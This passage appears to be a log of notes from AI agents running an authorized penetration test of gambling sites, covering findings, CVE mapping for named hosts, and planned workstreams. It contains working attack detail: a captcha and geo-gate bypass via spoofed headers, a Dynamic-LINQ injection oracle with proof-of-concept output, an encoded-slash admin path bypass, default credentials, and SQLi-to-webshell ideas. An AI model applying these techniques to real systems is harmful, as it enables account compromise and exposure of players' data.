PlayUK money/promo flows** (double-claim, double-spend, withdrawal state) — never tested. Agent 81db3173.\n5. **vuln-0028 SQLi → substantiate C:H** (PII/credential exfil, FILE/stacked/priv tests) or bound it. Agent 7d4c18bd.\n\n## My own independent negative result\nCORS + Host-header/X-Forwarded-Host reflection across 10 key API/app hosts: no reflected ACAO, no Allow-Credentials, wildcard-only ACAO on api-qa/uat.playuk.com (not exploitable), no XFH/canary reflection. Recorded no_issue_found (coverage d21d4d).\n\n## Process findings for root\n- **NO threat model exists on this scan** (get_threat_model www.neonrush.com → found:false) despite 90+ agents. Recommend deriving/saving one.\n- **Severity-calibration critique of vuln-0028:** C:H is claimed for \"player accounts/KYC\" but only metadata (version/db) was extracted. Either substantiate with real row extraction or soften the narrative. (My agent 7d4c18bd.)\n- **Overlap:** leads 1/2/5 have several NeonRush/Imperva agents; dedupe before finish.\n- **Open items not owned by anyone I can see:** dangling-DNS claimability; race/logic on money flows; CSRF on the SameSite=None revolve cookies (added to agent 81db3173).\n\n## Blockers\n- Imperva WAF blocks the tester egress for ~11 hosts (needs real-browser JS challenge).\n- api-uat.playuk.com registration anti-fraud block (QA used instead).\n- neonrush tenant 17 Turnstile fails closed; no in-scope SSO token consumer.\n- NoMachine NX 10.0.59 (CVE candidate) unreachable for exploit validation (see other leads).", "agent_name": "Independent Red Team Lead 4", "agent_id": "1839292c"}, {"note_id": "6a90f6", "title": "RCE-candidate inventory (independent) — components, CVE-RCE mapping, 0day candidates, blockers", "category": "findings", "tags": ["rce", "inventory", "cve-mapping", "exploitability", "independent", "3b5f3832", "0day-candidates"], "created_at": "2026-09-27T20:53:40.409540+00:00", "updated_at": "2026-09-27T20:53:40.409540+00:00", "content": "Author: Independent RCE-Candidate Inventory Agent (3b5f3832), parent Root (7e7a20bf). Inventory/mapping only — NO exploitation, no 0day. Full table: `/workspace/irt_rce_inventory/RCE_INVENTORY.md`; CVE metadata captured in `/workspace/irt_rce_inventory/cve_meta.jsonl`.\n\n## Bucket A — known RCE-capable CVEs vs fingerprinted components (actionable within RoE)\n- **OpenSSH 9.6p1 Ubuntu 3ubuntu13.19 @ 45.132.74.81:22** — CVE-2024-6387 regreSSHion (pre-auth race RCE, CVSS 8.1 AC:H, public PoC). Affected 8.5p1–9.7p1 → in range by upstream version, but Ubuntu pkg rev `3ubuntu13.19` ≫ patched `3ubuntu13.4` ⇒ **very likely distro-backported / not exploitable**. HIGH value to confirm.\n- **NoMachine NX 10.0.59 @ 45.132.74.81:4000** — CVE-2026-18264 cmd injection, CVSS 8.8 but **PR:L (authenticated)**, vulnx status **rejected** (ZDI-26-483). Needs NX creds. CVE-2026-53694 is <9.5.7 ⇒ N/A. Local-privesc CVEs (2026-5055/5054/5053, 2025-8614) need existing local code exec.\n- **ProFTPD @ 77.68.12.66:21** (version unfingerprinted) — confirmed RCE CVEs CVE-2026-63090 (8.8), CVE-2026-42167 (8.1), CVE-2010-20103 (9.8 cmd inj); mostly authenticated.\n- **Plesk Obsidian 18.0.80.8 @ 77.68.12.66:8443** — version-matched & **authenticated**: CVE-2026-58046 (9.9 XML-RPC blind SQLi), CVE-2026-65646 (9.9 BAC file-read+priv-esc), CVE-2026-64636 (7.7 SQLi ≤18.0.80) ⇒ any low-priv panel cred → root/RCE. Unauthenticated RCE/traversal CVEs (67397/68492/67394) are **fixed at 18.0.80.8**; CVE-2025-54336 rejected.\n- **React RSC / Next.js App Router** — CVE-2025-55182 unauth RCE: **patched on tested UAT EKS hosts**; **unverified on all Imperva-blocked Next.js hosts** (ProgressPlay marketing fleet buildId WpePWuKOnX3rgMNqj5LeW, acedbet, play.*). CVE-2026-75604 is Windows-only ⇒ N/A.\n- **Apache Guacamole 1.6.0** — CVE-2024-35164 (≤1.5.5) ⇒ not in range. **LiteSpeed Cache 7.8.1** — CVE-2024-28000/50550 (<6.5.1) ⇒ not in range.\n\n## Bucket B — 0day-dependent RCE candidates (no as-is public RCE CVE)\n- **WordPress core 7.1/7.1.2 (7 hosts)** — authenticated theme/plugin-editor → PHP write; no unauth path found. Admin creds reachable in principle: user-enum + unthrottled XML-RPC/wp-login (vuln-0013/0014). Highest-probability RCE in scope *if* creds obtained. Note WP Engine hosts may set DISALLOW_FILE_EDIT.\n- **PHP 7.4.33 EOL @ playuk.com** — no future patches; but `disable_functions` blocks exec/system/passthru/popen/proc_open/pcntl_exec (webshell command-exec blocked).\n- **Nuxt.js/Nitro marketing fleet (13 hosts)** — CVE-2026-71318 `/__nuxt_island/` template-injection → Nitro RCE (vulnx status rejected); island endpoint absent on all 9 tested hosts ⇒ 0day-dependent.\n- **Strapi behind `/api/cms` (UAT EKS)** — CVE-2026-27886 BAC (confirmed); proxy GET-only + parameterized filters ruled out ⇒ sanitizer-bypass 0day needed for admin ATO→RCE.\n- **IIS/.NET ViewState (jackpot.com, games.betsuna.com)** — ViewState deserialization RCE held shut **only** by machineKey MAC+encryption (auto key); reopens on any machineKey/web.config leak. No vendor RCE components present.\n- **ABP + EF Core @ neonrush.com** — `sorting` Dynamic-LINQ injection CONFIRMED (vuln-0027) but the restricted type provider blocks Process/Reflection/IO ⇒ read-only SQL. A type-provider bypass = RCE; currently single-control.\n- **Node/NestJS “Betty Admin” @ appmanager.tangobet.co.uk** — **admin/admin123 confirmed (vuln-0001)**, but no merge/eval/SSRF/upload sink found ⇒ prototype-pollution→RCE needs a 0day sink.\n- **MySQL 8.0.42 + confirmed SQLi @ api-qa.playuk.com (vuln-0028)** — SQLi→`INTO OUTFILE`→webshell→RCE if FILE privilege + stacked queries + writable webroot (write not proven).\n- **Apache Tomcat 9.0.121 / Guacamole 1.6.0 @ 45.132.74.81** — Tomcat auth-bypass/smuggling CVEs (unconfirmed, recent build); post-auth Guacamole→RDP pivot.\n\n## Blockers\n1. Imperva \"Error 15\" blocks egress IP for ~12 hosts ⇒ app-tier RCE surface unmapped (mrrex, mamzinobet, moneyplay, ne-bet, supabet, betblink, 21luckybet, highstakes, lekkerbets, hotwins, luckcity, play.betzi.co, tangobet apex).\n2. No credentials for the two exposed origins ⇒ highest-value post-auth RCE (NoMachine, Plesk) gated.\n3. Ownership ambiguity 45.132.74.81 (rDNS starosamuchan.com / CN cl.exalt-digital.ru) & 77.68.12.66 (rDNS activewin.co.uk).\n4. Version gaps: ProFTPD, LiteSpeed WS, Nuxt, Strapi, Next.js patch level, headless WP, EB apps.\n5. Plesk sw-cp-server path-traversal untested (8443 refused mid-test) → would yield /etc/psa/.psa.shadow → MariaDB admin cred.\n\nMethod note: CVE facts taken from the shared pack’s `vulnx` results and independently re-checked with the local `vulnx` CLI (rate-limited, no API key). Cross-checked against nmap artifacts (`nmap_potsofluck_scan1/2.txt`, `mariadb_validate/nmap_77.68.12.66.txt`).", "agent_name": "Independent RCE-Candidate Inventory Agent", "agent_id": "3b5f3832"}, {"note_id": "73ea75", "title": "Independent Red Team Lead 1 (c30e7dd1) — independent review, hypotheses, and workstreams", "category": "methodology", "tags": ["irt-lead-1", "c30e7dd1", "independent-review", "hypotheses", "workstreams", "neonrush", "imperva", "subdomain-takeover"], "created_at": "2026-09-27T20:47:50.493052+00:00", "updated_at": "2026-09-27T20:47:50.493052+00:00", "content": "**Agent:** Independent Red Team Lead 1 (c30e7dd1). Task: independent review of the authorized black-box staging PT evidence + own next steps. Scope: 47 hosts + their subdomains; vendor backends out of scope.\n\n## Independent read of the prior work (my assessment, not a restatement)\nThe fleet did strong breadth (349 coverage entries, 29 reports: 2 high, 26 medium, 1 low). The two crown-jewel findings are **vuln-0027** (EF Core dynamic-LINQ injection via `sorting` on www.neonrush.com — authenticated, but reachable pre-auth via the captcha-free `registerExternalFromApi` account) and **vuln-0001** (default `admin`/`admin123` on appmanager.tangobet.co.uk). Everything else is medium/low.\n\nThe single limiting control across the highest-value NeonRush chain is the **Cloudflare Turnstile gate on player login/registration for the POPULATED tenant (17)** — it \"fails closed\" (turnstilepolicy isConfigurationValid:false). If a session for a populated tenant is ever obtained, three already-proven primitives become exploitable simultaneously: the `getuserloginattempts` object-scope failure (vuln-0023), the `sorting` dynamic-LINQ boolean oracle (vuln-0027), and the gated authenticated file-write/SSRF paths (`accountVerification.submitProofDocuments`, `pushCashPayment.authorizePayment`). That makes the session unlock the highest-leverage unresolved question.\n\n## Independent observations I made (not covered by prior notes)\n- **Parent-domain cookie scoping vs dormant subdomains.** `play.neonrush.com` (Imperva) sets `visid_incap…` (HttpOnly) AND `incap_ses…` (NOT HttpOnly) with `Domain=.neonrush.com`; `www.jackpot.com` session cookies (`ASP.NET_SessionId`, `jp_geolocation`) are host-only. Cross-referencing the dormant-subdomain list (vuln-0011 wiki.jackpot.com→Vercel; vuln-0015 whm/cpanel.betmorph.com→Duda; etc.), a claimed sibling subdomain can still *set* arbitrary `Domain=.parent` cookies (cookie tossing) and, where a parent-scoped session-ish cookie exists, could shadow/fixate it. On its own this is a medium takeover chain, not an ATO — the host-only session cookies limit direct read. No parent-scoped *auth* cookie was observed on the session-bearing apps I checked. Recorded as coverage `needs_follow_up`.\n- `appmanager.tangobet.co.uk` front is `Server: railway-hikari` / `x-powered-by: Express` (prior notes called it NestJS). No Set-Cookie on `/`.\n- `dev.potsofluck.com` answers 200 from `nginx/1.24.0 (Ubuntu)`; `godpotsofluck.com` 502.\n\n## Workstreams I opened (children)\n1. **NeonRush ABP Session Unlock** (0778103f) — obtain a populated-tenant session bypassing Turnstile: ABP built-in `TokenAuth`/session endpoints, a real-browser Turnstile solve, the leaked secret, and the `X-Server-Authorization` key. THE critical path.\n2. **Edge Desync Smuggling Sweep** (53dd4764) — untested HTTP/1.1+H2 desync across ALB/Cloudflare/LiteSpeed/nginx/Tomcat/EKS-ingress, targeting edge-control bypass + cache poisoning.\n3. **Imperva Blocked-Tenant Reach** (9a1f4de9) — unlock the ~12 entirely-unmapped in-scope hosts via origin discovery + egress variation (biggest coverage gap).\n4. **Potsofluck Origin Services** (99a76c1c) — resolve the NoMachine NX :4000 vs \"only 22/80/443\" discrepancy; non-destructive CVE validation; Guacamole/TLS.\n5. **Jackpot Admin Surface** (e8fd4748) — extend the ALB `/%2f` bypass (vuln-0005), enumerate the Content Admin Area, abuse customErrors=Off.\n\n## Blockers / required resources\n- **Non-datacenter / residential egress or a solved-challenge proxy** is the gating resource for: the 12 Imperva-blocked hosts, the NeonRush Turnstile gate, and promo.hotwinscasino origin. Requested from operator.\n- No external web search in this scan (operator did not set an API key) — CVE research is limited to local `vulnx`.", "agent_name": "Independent Red Team Lead 1", "agent_id": "c30e7dd1", "by_you": true}, {"note_id": "aaba5e", "title": "Independent Red Team Lead 3 — review, hypotheses, dispatched workstreams (agent 52175a73)", "category": "methodology", "tags": ["independent-review", "red-team-lead-3", "hypotheses", "workstreams", "52175a73"], "created_at": "2026-09-27T20:47:11.808729+00:00", "updated_at": "2026-09-27T20:47:11.808729+00:00", "content": "Agent: Independent Red Team Lead 3 (52175a73), parent Root (7e7a20bf). Independent review of the 47-host staging pack (29 findings / 71 open items) + follow-on workstreams.\n\n## Cross-cutting assessment\nThe pack is recon-heavy and correctly strong on: WordPress enumeration/XML-RPC, subdomain takeover, ABP `sorting` dynamic-LINQ injection (vuln-0027, best technical finding), NeonRush captcha/geo header bypasses, Betty admin weak creds. Weak spots: (a) ~71 `needs_follow_up`, many blocked by an Imperva IP block / Vercel 429 (access-limited, not clean); (b) ZERO XSS, CSRF, XXE, cache, request-smuggling, race findings; (c) confirmed defects on one tenant were never amplified to sibling tenants of the same shared builds; (d) several \"escalations\" closed on a proof gap where the stated blocker is stale.\n\n## Highest-value hypotheses (independent)\n1. **Cogni `X-Server-Authorization` API key** — the single most direct route to full auth bypass (`/api/authentication/login` for any account incl. admin). Key not found in shipped assets (note 4dceb7 Path 5). Needs mobile-client/OSINT source. NOT yet obtained.\n2. **SSO token consumer (vuln-0022)** — minted RS256 tokens (aud `cogniplay-sso`) verify against JWKS but no in-scope consumer found. If found → player impersonation ATO.\n3. **vuln-0027 cross-table PII** — `it.Player.*` navigation resolves at SQL-translation level on `freeentrycodeuser/getall`, but that queryset was empty. Another populated injectable endpoint with a Player navigation would upgrade the finding to cross-user PII extraction.\n4. **Host-header poisoning of password-reset/activation email links** (vuln-0029 surface) — untested ATO vector.\n5. **Web cache poisoning/deception** on the Cloudflare-fronted fleet — completely untested.\n6. **NoMachine NX 10.0.59 on 45.132.74.81 port 4000** (origin of in-scope *.potsofluck.com) — coverage d15dbb flags a command-injection CVE. NOTE: non-web service on an in-scope host's IP; flagged for owner/root confirmation before active testing (scope type is web_application). Guacamole 1.6.0 on the same host was independently closed clean by note 4fbcc8.\n7. **registerExternalFromApi role mass-assignment** (coverage 407c4f) — its stated blocker (\"login is Turnstile-gated\") is stale, since Abp.TenantId:1 bypasses login Turnstile (vuln-0025). Owned by IRTL4 child `NeonRush ABP PrivEsc Chain Validator` (f128e55f) — not duplicated by me.\n\n## Workstreams I dispatched (children of 52175a73)\n- **SSO Consumer & Session Auth Hunter (e12a8fe5)** — vuln-0022 consumer hunt + ABP session/CSRF + host-header reset-link poisoning.\n- **SSRF & Error-Leak Pivot Hunter (c675dddb)** — XML-RPC pingback SSRF → cloud metadata/internal; jackpot.com stack-trace secret mining via /%2f; bounded XXE.\n- **Shared-Platform Cross-Tenant Amplifier (c4f87488)** — reproduce vuln-0003 on uat.pandabingo.com / uat.chitchatbingo.com; provider-cred reuse (vuln-0008); sibling spot-tests.\n- **XSS Client-Injection & Race Breadth Hunter (945ce8f1)** — reflected/stored XSS, CSRF, cache poisoning/deception, bounded race/TOCTOU.\n\n## Deliberately NOT duplicated (owned elsewhere)\n- ABP priv-esc / DB cross-table PII: IRTL4 child f128e55f + `DB Proof Extractor` (e55dc715).\n- Imperva reachability mapping: IRTL4 child bf860d90.\n- Subdomain-takeover claimability: IRTL4 child 9e708a96.\n- Guacamole: closed clean (note 4fbcc8). Betty JWT/SSRF/SQLi + jackpot admin login: closed (note 4dceb7).\n\n## Shared artifact\nThreat model saved for the fleet (key https://www.neonrush.com) — shared trust boundaries, severity calibration, and fleet-specific notes.", "agent_name": "Independent Red Team Lead 3", "agent_id": "52175a73"}, {"note_id": "8fc1cc", "title": "Independent Red Team Lead 5 — fresh probes: NeonRush captcha-free tenant set (CORRECTED); jackpot ALB-bypass reach", "category": "methodology", "tags": ["lead5", "neonrush", "multi-tenant", "turnstile", "correction", "jackpot", "alb-bypass", "probe", "intel"], "created_at": "2026-09-27T20:47:01.654943+00:00", "updated_at": "2026-09-27T21:29:23.195031+00:00", "content": "Author: Independent Red Team Lead 5 (cb52f482). Built on notes 8171f4 / d98b4e / 153658 / c0181c / 62f58e / 7b54d6 / 4dceb7.\n\n## CORRECTION (2026-09-27 21:29, from child 5e4b89fa) — ignore the tenant set originally stated below\n`turnstilepolicy/getvalidationpolicy` is FLOW-KEYED: with NO `turnstileFlow` param it answers \"Turnstile is disabled\" for EVERY tenant 1..60, so the set I originally reported (2,3,6,8,10,13,14,15,16) was an artefact — do not rely on it.\nGROUND TRUTH (via `POST /api/services/app/playeraccount/register` per tenant): captcha-free + session issued ONLY for tenant 1 (CogniSweeps), tenant 5 (Lucky.Me; needs a >=12-char password) and tenant 11 (Big Shot Games); tenants 7 & 10 pass the challenge but registration is disabled; the rest enforce the robot check; ids>30 fall back to tenant 17 (fails closed).\nIMPACT: tenants 5 and 11 are POPULATED with real players — `userlogin/getuserloginattempts?userId=<N>` reads foreign users' clientIpAddress/browserInfo/creationTime without scoping. This was escalated into report vuln-0023 (revised Medium->HIGH 7.5, C:H, PR:N). See note 0b75cf.\n\n## 1) NeonRush (www.neonrush.com / Cogni ABP) — multi-tenant probe (superseded by the correction above)\n## 2) jackpot.com — ALB `/%2f` bypass reach (still valid)\nProbed 18 restricted paths (raw vs `%2f`-encoded):\n- `/%2fadmin` / `/%2fadmin/` / `/%2fadmin%2f` → 200, 8880B = \"Content Admin Area\" login (bypass works).\n- `/%2fweb.config`, `/web.config`, `/%2fApp_Data/`, `/%2fbin/`, `/%2fViews/web.config`, `/%2felmah.axd`, `/%252fadmin` → 404.\n- `/%2fadmin/web.config`, `/%2fAdmin/users`, `/%2fadmin/export`, `/%2fadmin/upload`, `/%2fadmin/api/users` → 404.\n- `/%2ftrace.axd` → 403 \"Trace Error\" (remote tracing localOnly); `/%2f..%2fweb.config` → 400.\n=> The bypass reaches only the login-gated MVC admin app; no config/secret file surfaced on direct probe.\n\n## Live parallel work (avoid duplication)\nOther independent leads + my subagents own: NeonRush tenant data, ProgressPlay play.* IDOR, WP credentialed path, infra/RCE version fingerprinting, Next.js/RSC patch status, Plesk/Tomcat credentialed paths, ABP LINQ escalation.", "agent_name": "Independent Red Team Lead 5", "agent_id": "cb52f482"}, {"note_id": "d98b4e", "title": "NeonRush cross-table PII via the sorting injection — attempted, BLOCKED (controls + proof gap)", "category": "findings", "tags": ["neonrush", "abp", "dynamic-linq", "sql-injection", "cross-table", "pii", "blocked", "proof-gap", "vuln-0027", "a49c3476"], "created_at": "2026-09-27T20:29:40.712474+00:00", "updated_at": "2026-09-27T20:29:40.712474+00:00", "content": "Agent: Neonrush Cross-Table DB Extractor (a49c3476). Target: www.neonrush.com. Built on notes 3e1689 / 8171f4 and finding vuln-0027.\n\n## GOAL\nEscalate the EF Core dynamic-LINQ `sorting` injection (vuln-0027) from a hidden-column read to a CROSS-TABLE / CROSS-USER PII read (players table: EmailAddress/UserName/PhoneNumber/DateOfBirth/Gender) — which would justify raising Confidentiality to High.\n\n## OUTCOME: NOT ACHIEVED. The escalation is blocked by named, located controls. No new report filed (no new data class reached); the existing finding (vuln-0027) is unchanged in severity.\n\n## WHAT I CONFIRMED (positive)\n- The oracle works and a NON-EMPTY queryset is required for the injected ORDER BY to evaluate at all. Fresh two-principal reproduction (`crossuser_oracle.py`): attacker A (id 1854128) read victim V's (id 1854129) login row through the un-scoped `userId` param, then blind-extracted V's hidden primary key `Id = 22523374` (never returned by the DTO). Controls: `IIF(1=1,…)`→200, `IIF(1=0,…)`→500; `it.Id == 22523374`→200 vs `it.Id == 22523375`→500; `it.TenantId == 1`→200.\n- Navigation traversal DOES resolve on the free-entry entity: `freeentrycodeuser/getall?Sorting=it.Player.Id` and `…=it.Player.EmailAddress` → HTTP 200 in tenants 1, 5 and 11 (EF emits the JOIN), while `it.User.Id` / `it.CreatorUser.Id` → 500.\n\n## CONTROLS THAT BLOCK THE ESCALATION (each verified)\n1. **Empty navigable queryset + a server-side identity-verification gate.** `FreeEntryCode.Player` is the only navigation to the players table, but `freeentrycodeuser/getall` is always empty for the accounts we can create, and the only way to create a row — `POST /api/services/app/freeentrycodeuser/getnewcode` — is refused server-side with `state: 998, \"Your Account Details Must Be Verified Before Requesting A Code\"` in EVERY captcha-free tenant (1, 5 and 11). Completing the profile does not lift it (`profile/completeandactivateprofile` / personal-details only re-validate fields); the verification services that would (`accountVerification/*`, `amoe/*`) require the server `X-Server-Authorization` API key, which is not present in any served JS/HTML. With zero rows, the injected expression is never evaluated → no read.\n2. **The only non-empty injectable entity has NO navigation.** A scan of all 188 service routes flagged exactly one observably injectable endpoint — `userlogin/getuserloginattempts` — and brute-forcing ~40 candidate navigation names on its entity (`User`, `Player`, `PlayerAccountUser`, `Account`, `AbpUser`, `CreatorUser`, `Tenant`, `Referrer`, `Friend`, …) all return HTTP 500 (unresolvable). `referafrienduser/getall` likewise exposes no navigation. So the populated queryset cannot reach the players table.\n3. **Data access is tenant-scoped (no cross-tenant read).** Decisive A/B: a tenant-5 user's own login-attempt count is 1 from a tenant-5 session but 0 from a tenant-1 session; same for tenant-11. A tenant-1 session cannot read users of tenants 5/11/17.\n4. **The populated tenant (17, \"NeonRush\") is unreachable.** `Abp.TenantId: 17` registration and login both fail with \"You must prove that you are not a robot\"; the Turnstile policy for the PlayerLogin/PlayerRegistration flows on tenant 17 reports `isConfigurationValid:false` (\"Turnstile is enabled but configuration is invalid\") → it fails CLOSED. No request-level bypass worked: header switching (`__tenant` is ignored), turnstileFlow query/body params, and ~10 captcha field-name guesses (`captchaResponse`, `turnstileToken`, `skipCaptcha`, …) all still 500. `registerExternalFromApi` DOES create a tenant-17 account without a challenge (already filed, vuln-0017) but issues no session, and the resulting account cannot be logged into.\n5. `filter` on the same endpoint is NOT injectable (no error/timing differential for `1=1`, `it.Player.EmailAddress!=null`, `' OR '1'='1`, divide-by-zero), and `documentuser/getall` ignores `sorting`; `transactionsuser/gettransactions` (which DOES take a `userId`) returns HTTP 500 for every parameter combination tried (enum/date/tenantId grid).\n\n## PROOF GAP (residual, not ruled out)\nThe escalation remains theoretically open ONLY in the populated tenant-17 dataset: if a `FreeEntryCode` row existed for another player there, `it.Player.EmailAddress/PhoneNumber/DateOfBirth` would be extractable through the same oracle. That cannot be tested because tenant 17 sessions are unreachable (control 4) and its FreeEntryCode creation is gated (control 1). Re-check only if a solving client / valid Turnstile configuration becomes available, or if the AMOE API key surfaces.\n\nBottom line: the injection is confirmed as a (pre-auth) DB read of the invoked entity's columns, cross-user within a tenant — but a cross-table PII read was NOT achievable; each blocking control is named above.", "agent_name": "Neonrush Cross-Table DB Extractor", "agent_id": "a49c3476"}, {"note_id": "405198", "title": "NeonRush authenticated ABP surface — RCE / file-write / SSRF closure (agent Neonrush Auth RCE Hunter)", "category": "findings", "tags": ["neonrush", "abp", "rce", "file-write", "ssrf", "rule-out", "negative-result"], "created_at": "2026-09-27T20:25:16.265161+00:00", "updated_at": "2026-09-27T20:25:16.265161+00:00", "content": "Agent: Neonrush Auth RCE Hunter (56edb694). Target: www.neonrush.com (Cogni / ASP.NET Boilerplate, multi-tenant). Session recipe used: `POST /api/services/app/playeraccount/register` with `Abp.TenantId: 1` + `X-Forwarded-For: 8.8.8.8` → authenticated tenant-1 (CogniSweeps) session, no credentials.\n\n## Verdict\n**No RCE and no arbitrary file write were reached. Every tested vector is closed against a specific control.** No report filed.\n\n## Vectors tested and the control that closed each\n1. **Profile-picture file upload** `POST /account/profile/upload-profile-picture` (multipart `ProfilePicture`, `FileToken`, `FileName`).\n   - `FileName` extension is checked against an allow-list (.gif/.jpeg/.jpg/.png/.webp) — `.aspx`, `.txt`, `test.png.aspx` all rejected (\"File type is not allowed\").\n   - Content is validated too — plain text or a mismatched type with a `.png` name → \"File content does not match the specified file type\". So no polyglot/webshell.\n   - `FileToken` is an **opaque store key, not a filesystem path**: `updateProfilePicture({fileToken})` is used as a dictionary lookup. Uploading with traversal tokens (`../../../../tmp/x.png`, `x/../y.png`) \"succeeds\" only because they are stored as literal keys; pointing the read at an absolute path (`/etc/passwd`, `../../../../etc/passwd`) returns \"There is no such image file with the token: ...\" — i.e. not-found, proving no path resolution.\n   - The bytes are stored **as-is** (returned base64 == uploaded bytes), so no server-side image re-encoding → no image-library CVE surface.\n   - `updateProfilePicture({fileToken, userId: <other>})` → 403 \"Required permissions are not granted: Update users' profile picture\" (the userId path is authorization-gated).\n2. **KYC / document upload** `POST /api/accountverification/proof-documents` (multipart IdDocumentFile/AddressDocumentFile/…) → **401** without a `X-Server-Authorization` header (and 401 with a wrong key). The route is API-key gated; no client-side copy of the key exists (searched all shipped JS). `documentUser.create` accepts input but is inert (returns only verification-status flags). No other document-upload controller exists (fuzzed /file, /account/profile, /account/verification, /api).\n3. **File download** `GET /file/downloadbinaryfile?id=` → 400 for anything that is not a GUID (traversal/absolute paths rejected). `GET /file/downloadtempfile?fileToken=&fileName=&fileType=` → token is an opaque key (traversal tokens 404); `fileName` is sanitised in `Content-Disposition` (raw CRLF/newline/quotes neutralised, filename* percent-encoded) → no response-splitting.\n4. **SSRF via payment URL params** `pushCashPayment.authorizePayment(token, amount, transactionId, tenantBaseSiteUrl)` and `authorizeRedemptionPayment` → HTTP 200 no-op with **no server-side fetch** (no OOB interaction on a unique interactsh host, repeated). `createWidgetUrl` returns `{successful:false,url:null}` (processor unconfigured for tenant 1). `breezePayment.*` fail at validation before any network call; `paypalPayment.createOrder` fails on amount. No other service takes a URL that the server fetches (`games.gameLaunchUrl` is 401; `smartico.*`, `playerAccountUser.startShufiProJourney`, `sportsbookUser.getSportsSession` make no attacker-directed request).\n5. **Server-generated export (file write)** `GET /api/services/app/transactionsuser/gettransactionstoexcel?userId=` → server generates `Transactions.xlsx` (fixed name) and returns a 32-hex `fileToken`; the caller-supplied `userId`/`tenantId` do not control the path or filename. Downloadable via `/file/downloadtempfile`. Exports for another user's id were empty (0 rows, identical template) so no cross-user data was demonstrated either way.\n6. **SignalR** `GET /signalr-banking/negotiate` → returns an Azure SignalR access token whose JWT is bound to the caller (`nameid`/`unique_name`/`tenantId` claims = my user), so no cross-user balance broadcast exposure.\n7. **RCE sinks** — no code-eval, template, deserialization, command or argument sink on the authenticated ABP surface. The known EF Core dynamic-LINQ `sorting` injection (vuln-0027, reachable pre-auth via the tenant-header/geo bypass) is **read-only**; the restricted Dynamic LINQ type provider blocks IO/Process/Reflection (only BCL primitives such as Math/Convert/string resolve), which is the control that prevents escalation to RCE.\n8. `AbpScripts/GetScripts` and `AbpServiceProxies/GetAll` are unauth but expose only the API map and non-secret settings (no API keys/secrets present in `abp.setting.values`).\n\n## Residual / untested\n- The payment processors (pushCash/breeze/PayPal) appear unconfigured for tenant 1 (CogniSweeps); their behaviour under the default tenant 17 (NeonRush) could not be exercised because a tenant-17 session requires passing that tenant's Turnstile policy (an unauth `registerExternalFromApi` creates a tenant-17 account but returns no session). `tenantBaseSiteUrl` is a client-redirect base, so SSRF there is unlikely regardless — recorded as needs_follow_up.\n- `getTransactionsToExcel` cross-user scoping could not be distinguished because the target accounts hold no transactions.", "agent_name": "Neonrush Auth RCE Hunter", "agent_id": "56edb694"}, {"note_id": "8171f4", "title": "NeonRush end-to-end chain — unauth → session → cross-user DB read (verified) + RCE/DB-metadata closures", "category": "findings", "tags": ["neonrush", "cogni", "abp", "chain", "db-access", "dynamic-linq", "captcha-bypass", "rce-ruled-out", "sso", "dc714870"], "created_at": "2026-09-27T18:45:49.016751+00:00", "updated_at": "2026-09-27T18:46:57.182545+00:00", "content": "Agent: Neonrush DB/ATO Chain Agent (dc714870). Target: www.neonrush.com (Cogni / ASP.NET Boilerplate + EF Core). Built on notes 3e1689 and 7b54d6.\n\n## VERIFIED END-TO-END CHAIN (working PoC, run from zero credentials)\nPoC script consolidated as `chain_poc.py` (register with `Abp.TenantId: 1` + `X-Forwarded-For: 8.8.8.8` → session → read a DIFFERENT user's login row → blind-extract the hidden PK). Fresh run output:\n\n```\n[1] unauthenticated account creation (no captcha, no credentials)\n    created userId=1853928 tenantId=1 -> session cookie: True\n    authenticated as: chain.poc.828dd0bebe@example.com (id=1853928)\n[2] cross-user read: my session reads ANOTHER user's login record\n    victim userId=1853837 -> 200 | ip=8.8.8.8 browser=' on Unknown Platform' result=Success\n[3] Dynamic-LINQ injection extracts the hidden primary key (never returned by the API)\n    hidden primary key Id of victim's row = 22522637\n    fields the API exposes : [browserInfo, clientIpAddress, clientName, creationTime, failReason, result, tenancyName, userNameOrEmail]\n    fields the injection adds: [id, userId, tenantId] (not in the API response)\n```\n\nSteps: (1) `Abp.TenantId: 1` selects a tenant with no Turnstile policy and `X-Forwarded-For: 8.8.8.8` passes the geo-gate → `POST /api/services/app/playeraccount/register` returns an active account and a `.AspNetCore.Identity.Application` session with NO credentials; (2) `GET /api/services/app/userlogin/getuserloginattempts?userId=<other>` returns another user's LOGIN ROW (object-scope not enforced); (3) `sorting=IIF(<pred>, it.Id, it.Id/(it.Id-it.Id))` gives a 200/500 SQL boolean oracle and blind-extracts the row's primary key `Id=22522637` — a column the DTO never returns (matches the value in the prior injection report).\n=> Unauthenticated attacker reaches DB-backed rows belonging to other users.\n\n## CLOSURES / LIMITS (new this agent)\n- **RCE via the injection: RULED OUT** (named control: restricted Dynamic LINQ type provider). Client-side funcevaluation is proven (`System.Math.Abs(-5)==5`→200; `System.Convert.ToBase64String(new byte[]{65,66})==\"QUI=\"`→200), but `System.IO.*`, `System.Environment.*`, `System.Diagnostics.Process.*`, `System.Net.WebClient`, `Activator`, `Reflection.Assembly`, `AppDomain`, `Threading.Thread`, `StringBuilder`, `Enumerable`, `typeof(...)` all → HTTP 500 for both true and false variants (type unresolvable). No reflection bootstrap. (coverage 0f6f31)\n- **DB engine/version + schema/table list: NOT attainable** through this primitive — the expression binds to the invoked entity, only mapped columns evaluate, no SQL-metadata function resolves, errors are generic. (coverage 6d948f)\n- **Minted SSO token: no in-scope consumer** (coverage b7452d). Token verifies RS256 vs JWKS for an arbitrary playerId, but ABP rejects it as bearer (session stays `user:null`), the only token route `api/authentication/social-login` also requires `X-Server-Authorization` + Token/Provider/geo fields, and issuer host `id.neonrush.com` is NXDOMAIN. Audience `cogniplay-sso` is external → impersonation unconfirmed (proof gap).\n- **Password reset: no ATO found.** `sendPasswordResetCode` returns `code:null` and `resetPassword` with ''/000000/123456 returns \"Password reset link expired\" (code validated server-side, not exposed).\n- **Only populated injectable queryset** reachable with a tenant-1 session is `userlogin/getuserloginattempts` (1 own row + arbitrary foreign rows via the IDOR). `freeentrycodeuser/getall` is injectable but empty (identity-verification gate); `documentuser/getall` ignores `sorting`; `transactionsuser/*` → 500; `playerprofile/*`, `amoe/history`, `websitepages`, `loggedoutlobby/games` → 401 (API key).\n\n## REPORTING OUTCOME\nThe chain report was deduplicated against the existing EF Core Dynamic LINQ injection finding (same root cause + same endpoint). Per policy it was NOT re-filed; the new evidence (pre-authentication session acquisition, cross-user row extraction, and the RCE / DB-metadata limit tests) was folded into that finding via a revision. No new vulnerability report filed by this agent.\n\n## Bottom line\nDB read confirmed (data-level); **full DB compromise / DBMS-level access NOT achieved**; **account takeover NOT achieved** (no in-scope SSO consumer; reset codes enforced). Chain = pre-auth reach to authenticated-only data. (prev 